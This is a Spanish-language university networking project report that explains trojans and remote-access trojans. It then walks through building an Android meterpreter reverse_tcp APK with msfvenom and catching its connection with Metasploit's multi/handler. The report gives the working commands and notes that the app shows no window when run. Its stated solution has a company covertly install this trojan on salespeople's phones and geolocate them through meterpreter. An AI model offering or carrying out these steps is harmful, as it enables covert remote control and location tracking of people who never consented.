Sie sind auf Seite 1von 6

PROYECTO REDES DE DATOS II 2018

UNIVERSIDAD ESTATAL DE MILAGRO


INGENIERÍA EN SISTEMAS COMPUTACIONALES

NOMBRE DEL PROYECTO:


SEGURIDAD: CREACIÓN DE UN APK PARA ANDROID DESDE KALI, QUE PERMITA EL CONTROL Y
MONITOREO DE UN SISTEMA ANDROID

INTEGRANTES DE GRUPO:
VICTOR GAVILANES

VIVIANA JARA

ALEXANDRA GUZMAN

DOCENTE:
ING. FREDDY BRAVO
PROYECTO REDES DE DATOS II 2018

PROBLEMA
“Una empresa de seguridad desea ubicar un APK en un cliente de Android para un
monitoreo a ciertos usuarios que se cree que no hacen el recorrido que se les indica,
son vendedores externos. Para tal gestión lo han contratado a Ud. para realizar el APK,
Ud. conoce que es posible hacer un troyano con Kali Linux, y ofrece esa solución.”

LOS TROYANOS
Los Troyanos son un tipo de malware que utilizan técnicas de ingeniería social para
conseguir que un usuario lo ejecute sin percatarse del riesgo. Normalmente, suelen
ocultarse detrás de programas legítimos, aplicaciones crackeadas, extensiones de
navegadores, adjuntos infectados o incluso software gratuito de origen un tanto incierto
que suscitan un gran interés para sus víctimas.

Una vez descargado, instalado y ejecutado el software legítimo, el malware se despliega


sin el consentimiento y conciencia del usuario. Por ello, en muchas ocasiones pasa
inadvertido por los mismos.

Este tipo de malware, está diseñado para proporcionar al atacante la posibilidad de


realizar ciertas acciones de forma remota sobre una máquina infectada con fines
perjudiciales para sus legítimos propietarios. Entre sus acciones maliciosas, podemos
destacar robo de información confidencial, conceder el acceso remoto al atacante,
causar daños sobre el dispositivo o dispositivos interconectados (como por ejemplo
corromper el sistema operativo o formatear un disco duro), introducir el dispositivo
infectado en una botnet para posteriormente ser utilizada por el atacante con objetivos
ilícitos, entre otras.

Por lo tanto, los Troyanos son muy peligrosos ya que pueden llegar a causar importantes
estragos en los equipos infectados pasando desapercibidos por parte de los usuarios.
Sin embargo, no tienen la capacidad de replicarse por sí mismos como hacen otro tipo
de software malicioso como los virus o gusanos. Con lo cual, quedarán exclusivamente
alojados en el dispositivo infectado.

TROYANOS DE ACCESO REMOTO


Los Troyanos de Acceso Remoto (RAT) o Troyanos de Puerta Trasera son un tipo de
malware cuyo objetivo principal es instalar una serie de herramientas en los equipos
infectados que permitan al atacante poder gestionarlos remotamente de la forma más
desapercibida posible. Una vez instalados en la víctima, se ejecutarán e intentarán
brindar la capacidad al atacante de obtener acceso remoto no autorizado a través de
protocolos de comunicación previstos que se configuran cuando se produce la infección
inicial. Con lo cual, el atacante introduce una puerta trasera (backdoor) en los
dispositivos comprometidos para permitir el acceso evitando cualquier mecanismo de
seguridad que se lo impida. A través de ella, el cibercriminal podrá controlar el
comportamiento del usuario, cambiar la configuración del dispositivo (por ejemplo,
abriendo puertos), gestionar sus archivos, emplear los recursos del dispositivo para
llevar a cabo acciones ilícitas, acceder a otros sistemas interconectados entre otras.
PROYECTO REDES DE DATOS II 2018

EFECTOS
Los posibles efectos maliciosos que podría provocar este tipo de malware son bastante
diversos. Esto es así, ya que, si encontramos un Troyano RAT desplegado en un
dispositivo, quiere decir que el atacante ha podido realizar cualquier tipo de acción
maliciosa, debido a que mantiene el control absoluto sobre el mismo. Sin embargo,
podemos destacar algunas:
 Robo de información sensible o personal del usuario propietario del dispositivo
comprometido. Para ello, se pueden instalar keyloggers, utilizar el hardware del
dispositivo (cámara o micrófono si estamos en un dispositivo móvil) entre otras.
 Uso de los recursos del dispositivo para llevar a cabo acciones delictivas en
nombre del atacante. Inclusive, introduciéndolos en una red de dispositivos
comprometidos (botnets) para causar el mayor daño posible.
 Punto de entrada por el cual introducir de otro tipo de malware en el dispositivo
comprometido por parte del atacante.

Existen muchas más acciones maliciosas que dependen en gran medida del cometido
para el cual este diseñado el Troyan RAT en cuestión. Una vez esté instalado y
desplegado en el dispositivo, podría realizarse cualquier acto ilícito requerido por parte
del atacante.

CREACIÓN DE UN APK A TRAVÉS DE KALI LINUX


PAYLOAD
Un payload es un virus o malware que consiste en realizar una acción (normalmente
maliciosa) en un dispositivo que esté conectado dentro de nuestra red o fuera de otra.
El fin que tiene un payload es tener control total y remoto del dispositivo que se quiera
interceptar en cuestión.

METASPLOIT
Metasploit es una herramienta de hacking y pentesting destinada a la explotación y tests
de penetración de una manera sencilla. Esta herramienta es conocida por ser como una
"navaja suiza" para los hackers y prácticamente todas las distribuciones de Linux lo
traen.

CREACION DEL APK

Antes que nada, es necesario iniciar con el sistema Kali Linux. Una vez iniciado se
abre una terminal y se ejecuta la siguiente sintaxis;

"msfvenom -p android/meterpreter/reverse_tcp LHOST=xxxx LPORT=xxxx R > name.apk"

El comando se divide en varias partes que son:


 msfvenom Es la aplicación donde desarrollamos el payload
 -p Estamos indicando que vamos a realizar un payload
 android/meterpreter/reverse_tcp Es el tipo de payload que necesitamos
 LHOST Es la IP que usará la aplicación para comunicarse con nosotros. Si se
va a hacer dentro de la red nuestra el valor es 192.168.1.1 pero si es fuera de
nuestra red deberá ser nuestra IP Pública
PROYECTO REDES DE DATOS II 2018
 LPORT Es el puerto donde se conectará nuestra aplicación. Si la red es interna
yo uso el puerto 8080 pero si es en una red exterior deberemos abrir el puerto
que deseemos
 R > name.apk Es la ruta donde almacenaremos el payload y con qué nombre.
La ruta por defecto (cuando ponemos solo el nombre, es la carpeta personal o
la de root).

Al ejecutar el comando anterior deberíamos obtener el siguiente resultado, el cual nos


dirá el peso de nuestro Payload y que efectivamente fue creado:

CONFIGURANDO METASPLOIT
Ya firmada la aplicación procederemos a crear la conexión con el teléfono objetivo, todo
esto mediante la consola de Metasploit.
Mediante el comando msfconsole ingresaremos a la consola de Metasploit y
deberíamos encontrarnos con algo así:

Ya dentro de la consola de Metasploit ingresaremos lo siguiente:

use exploit/multi/handler

Un handler en Metasploit es con lo cual estableceremos una conexión con el objetivo.


Dependiendo del Payload que se utilice, el handler puede ser de escucha o recepción
(gracias a un reverse Payload) o puede iniciar una conexión con un host a un Puerto
específico (gracias a un bind Payload).
Luego de ejecutar el uso del handler pasaremos a configurarlo:
Primero setearemos el Payload con el cual hicimos el .apk anteriormente:
set payload android/meterpreter/reverse_tcp
Luego la ip y puertos que pusimos también al momento de crear nuestro apk:
set LHOST <nuestra ip>
set LPORT <Puerto que designamos>
Cuando ya hemos configurado cada parte, arrancamos el exploit con el
comando exploit, con el cual, al haber hecho uso de reverse_tcp quedará a la escucha
de la próxima conexión que se establezca. Veremos algo así:
PROYECTO REDES DE DATOS II 2018

Ya habiendo instalado la aplicación deberíamos ver un icono que se llame MainActivity


dentro de nuestro teléfono, al ejecutarlo no abrirá ninguna ventana, pero sí se
establecerá por fin la conexión con nuestra consola Metasploit.

Como resultado al ejecutar la aplicación en el teléfono, veremos algo así en nuestra


consola:
PROYECTO REDES DE DATOS II 2018
Con el comando help podremos verificar la lista de comandos disponibles para usar
en nuestro ataque con sus respectivas descripciones.

SOLUCIÓN
“Una empresa de seguridad desea ubicar un APK en un cliente de Android para un
monitoreo a ciertos usuarios que se cree que no hacen el recorrido que se les indica,
son vendedores externos. Para tal gestión lo han contratado a Ud. para realizar el APK,
Ud. conoce que es posible hacer un troyano con Kali Linux, y ofrece esa solución.”

Ya una vez que el dispositivo tenga la aplicación instalada podemos ver todos los
movimientos que hará el usuario por medio de Kali.

En la sesión del Android, en meterpreter (terminal), escribir el comando wlan_geolocate


para saber la ubicación exacta del usuario. z

Bibliografía
Campos, L. (7 de Septiembre de 2016). HACKEANDO ANDROID CON METASPLOIT. Obtenido de
https://nnodes.com/blog/2016/hackeando-android-con-metasploit

Sanchez, K. (1 de Enero de 2018). MALWARE EN EL SISTEMA OPERATIVO ANDROID.

Das könnte Ihnen auch gefallen